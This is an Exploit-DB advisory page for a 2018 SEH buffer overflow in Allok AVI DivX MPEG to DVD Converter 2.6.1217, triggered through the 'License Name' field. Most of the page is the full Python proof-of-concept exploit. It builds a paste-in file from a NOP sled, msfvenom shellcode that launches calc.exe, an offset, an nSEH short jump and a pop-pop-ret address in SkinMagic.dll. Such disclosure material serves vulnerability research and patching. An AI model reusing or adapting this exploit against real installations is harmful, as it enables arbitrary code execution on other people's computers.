Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH)

vendor:

Allok AVI DivX MPEG to DVD Converter

by:

wetw0rk

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Allok AVI DivX MPEG to DVD Converter

Affected Version From: 2.6.1217

Affected Version To: 2.6.1217

Patch Exists: YES

Related CWE: N/A

CPE: a:alloksoft:allok_avimpeg2dvd

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10, Windows 7 (x86-64)

2018

Allok AVI DivX MPEG to DVD Converter – Buffer Overflow (SEH)

Allok AVI DivX MPEG to DVD Converter is vulnerable to a buffer overflow vulnerability when a user pastes a large amount of data into the 'License Name' field. This can be exploited to execute arbitrary code by overwriting the SEH handler with a jmp instruction and a shellcode.

Mitigation:

Update to the latest version of Allok AVI DivX MPEG to DVD Converter.

Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# Exploit Title         : Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH)
# Date                  : 3/27/18
# Exploit Author        : wetw0rk
# Vulnerable Software   : Allok AVI DivX MPEG to DVD Converter
# Vendor Homepage       : http://alloksoft.com/
# Version               : 2.6.1217
# Software Link         : http://alloksoft.com/allok_avimpeg2dvd.exe
# Tested On             : Windows 10 , Windows 7 (x86-64)
#
# Greetz : Paul, Sally, Nekotaijutsu, mvrk, abatchy17
#
# Trigger the vulnerability by:
#   Copy text file contents -> paste into "License Name" -> calc
#

shellcode = "\x90" * 20 # nop sled
shellcode += (          # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d" -f c
"\xd9\xe9\xd9\x74\x24\xf4\xbe\x4b\x88\x2c\x8f\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x70\x14\x03\x70\x5f\x6a\xd9\x73\xb7\xe8"
"\x22\x8c\x47\x8d\xab\x69\x76\x8d\xc8\xfa\x28\x3d\x9a\xaf\xc4"
"\xb6\xce\x5b\x5f\xba\xc6\x6c\xe8\x71\x31\x42\xe9\x2a\x01\xc5"
"\x69\x31\x56\x25\x50\xfa\xab\x24\x95\xe7\x46\x74\x4e\x63\xf4"
"\x69\xfb\x39\xc5\x02\xb7\xac\x4d\xf6\x0f\xce\x7c\xa9\x04\x89"
"\x5e\x4b\xc9\xa1\xd6\x53\x0e\x8f\xa1\xe8\xe4\x7b\x30\x39\x35"
"\x83\x9f\x04\xfa\x76\xe1\x41\x3c\x69\x94\xbb\x3f\x14\xaf\x7f"
"\x42\xc2\x3a\x64\xe4\x81\x9d\x40\x15\x45\x7b\x02\x19\x22\x0f"
"\x4c\x3d\xb5\xdc\xe6\x39\x3e\xe3\x28\xc8\x04\xc0\xec\x91\xdf"
"\x69\xb4\x7f\xb1\x96\xa6\x20\x6e\x33\xac\xcc\x7b\x4e\xef\x9a"
"\x7a\xdc\x95\xe8\x7d\xde\x95\x5c\x16\xef\x1e\x33\x61\xf0\xf4"
"\x70\x9d\xba\x55\xd0\x36\x63\x0c\x61\x5b\x94\xfa\xa5\x62\x17"
"\x0f\x55\x91\x07\x7a\x50\xdd\x8f\x96\x28\x4e\x7a\x99\x9f\x6f"
"\xaf\xfa\x7e\xfc\x33\xd3\xe5\x84\xd6\x2b"
)

offset  = "A" * 780
nSEH    = "\x90\x90\xeb\x06" # jmp +0x06
SEH     = "\x30\x45\x01\x10" # pop edi, pop esi, ret [SkinMagic.dll]
trigger = "D" * (50000 - len(# trigger the vuln (plenty of space!!!)
    offset  +
    nSEH    +
    SEH     +
    shellcode
    )
)

payload = offset + nSEH + SEH + shellcode + trigger 
fd = open("pasteME.txt", "w")
fd.write(payload)
fd.close()